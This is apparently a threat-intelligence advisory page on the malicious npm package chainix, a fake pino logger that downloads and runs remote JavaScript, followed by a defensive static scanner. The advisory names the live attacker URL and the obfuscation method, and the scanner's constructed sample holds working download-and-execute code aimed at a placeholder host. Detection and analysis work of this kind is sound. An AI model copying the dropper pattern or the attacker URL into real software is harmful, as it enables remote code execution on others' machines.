THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · obfuscation · osv

Malicious code in chainix (npm)

chainix

Risk score

92

AI summary

Indexed incident for chainix (npm).

Description

Source: amazon-inspector (93d9609d2eac0c0ff33aed557171138930255798aa649fa648b04814c8cb1908)

The package presents itself as a pino-compatible logger (its README badges link to pinojs/pino and it exports the alias module.exports.pino = middleware), but the exported middleware spawns a detached node lib/initializeCaller.js. That script base64-decodes a hardcoded URL to https://aqua-margit-84.tiiny.site/index.json, fetches the JSON over HTTPS with a base64-obfuscated x-secret-key header, takes the data.cookie field, and executes it via new Function.constructor("require", response)(require), compiling and running attacker-controlled JavaScript with full access to Node's require. The fetch retries 5 times. The C2 URL and the header name and value are stored as base64 in a fake process object to evade plain-text scanning. tiiny.site is an anonymous static-hosting service, so the content at that URL is mutable and attacker-controlled. This is a remote-code-execution dropper that fires when a consumer application invokes the advertised middleware, giving the attacker arbitrary code execution on any host running the application.
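The description above gives enough of the dropper's shape to write a first-pass static check for it. The scanner below is an added example written for this page, not code from ThreatPkg, Amazon Inspector or the chainix package: it decodes long base64 string literals and reports those that become URLs or HTTP header names, and it flags Function.constructor / new Function / eval calls and detached spawn() calls. Both inputs are constructed; example.invalid stands in for the real host, and nothing from the actual payload is reproduced.

```javascript
// Added example, not code from ThreatPkg or from the chainix package: a small
// static scanner for the dropper pattern described in the advisory. It decodes
// long base64 string literals and reports the ones that turn into URLs or HTTP
// header names, and it flags dynamic code compilation and detached child
// processes. Sample inputs are constructed; example.invalid is a placeholder host.

const B64_LITERAL = /["']([A-Za-z0-9+\/]{12,}={0,2})["']/g;
const DYNAMIC_EVAL = /\bFunction\.constructor\s*\(|\bnew\s+Function\s*\(|\beval\s*\(/g;
const DETACHED_SPAWN = /\bspawn\s*\([\s\S]{0,300}?detached\s*:\s*true/;

function classify(decoded) {
  if (/^https?:\/\//i.test(decoded)) return "url";
  if (/^x-[a-z0-9-]+$/i.test(decoded)) return "header-name";
  return "text";
}

// Decode base64 literals, keeping only printable strings that re-encode to the
// original literal; this drops long identifiers that merely look like base64.
function decodedLiterals(src) {
  const out = [];
  for (const m of src.matchAll(B64_LITERAL)) {
    const encoded = m[1];
    const decoded = Buffer.from(encoded, "base64").toString("utf8");
    const printable = /^[\x20-\x7e]+$/.test(decoded);
    const roundTrips = Buffer.from(decoded, "utf8").toString("base64") === encoded;
    if (printable && roundTrips) out.push({ encoded, decoded, kind: classify(decoded) });
  }
  return out;
}

// Run all three checks over one source file and summarise them as flags.
function scanSource(src) {
  const literals = decodedLiterals(src);
  const dynamicEval = [...src.matchAll(DYNAMIC_EVAL)].map((m) => m[0]);
  const detachedSpawn = DETACHED_SPAWN.test(src);
  const flags = [];
  if (literals.some((l) => l.kind === "url")) flags.push("base64-encoded URL");
  if (literals.some((l) => l.kind === "header-name")) flags.push("base64-encoded HTTP header name");
  if (dynamicEval.length) flags.push("dynamic code compilation");
  if (detachedSpawn) flags.push("detached child process");
  return { literals, dynamicEval, detachedSpawn, flags };
}

const b64 = (s) => Buffer.from(s, "utf8").toString("base64");

// Constructed sample shaped like the described dropper (placeholder host, no real payload).
const SAMPLE_DROPPER = `
const { spawn } = require("child_process");
const fake = { env: { U: "${b64("https://example.invalid/index.json")}", H: "${b64("x-secret-key")}" } };
spawn(process.execPath, ["lib/init.js"], { detached: true, stdio: "ignore" }).unref();
const url = Buffer.from(fake.env.U, "base64").toString();
const header = Buffer.from(fake.env.H, "base64").toString();
https.get(url, { headers: { [header]: "k" } }, (res) => {
  let body = "";
  res.on("data", (c) => (body += c));
  res.on("end", () => new Function.constructor("require", JSON.parse(body).data.cookie)(require));
});
`;

// Constructed benign sample: a plain pino wrapper, the kind of code the package claimed to be.
const SAMPLE_BENIGN = `
const pino = require("pino");
const logger = pino({ level: "info" });
module.exports = function middleware(req, res, next) { logger.info({ url: req.url }); next(); };
`;

for (const [name, src] of [["dropper", SAMPLE_DROPPER], ["benign", SAMPLE_BENIGN]]) {
  const r = scanSource(src);
  console.log(name + ": " + (r.flags.length ? r.flags.join(", ") : "no findings"));
  for (const l of r.literals) console.log(`  ${l.kind}: ${l.decoded}`);
}
```

Run it with node: the dropper-shaped sample produces four flags and the two decoded literals, the pino wrapper produces none. Treat the output as a triage aid rather than a verdict: a regex is easy to defeat with one more layer of encoding, and legitimate packages do sometimes embed base64 URLs (data URIs, signed manifests), so findings belong in front of a reviewer, not in an automatic block.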

Technical details

Affected versions


Indicators

  • affected_version (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents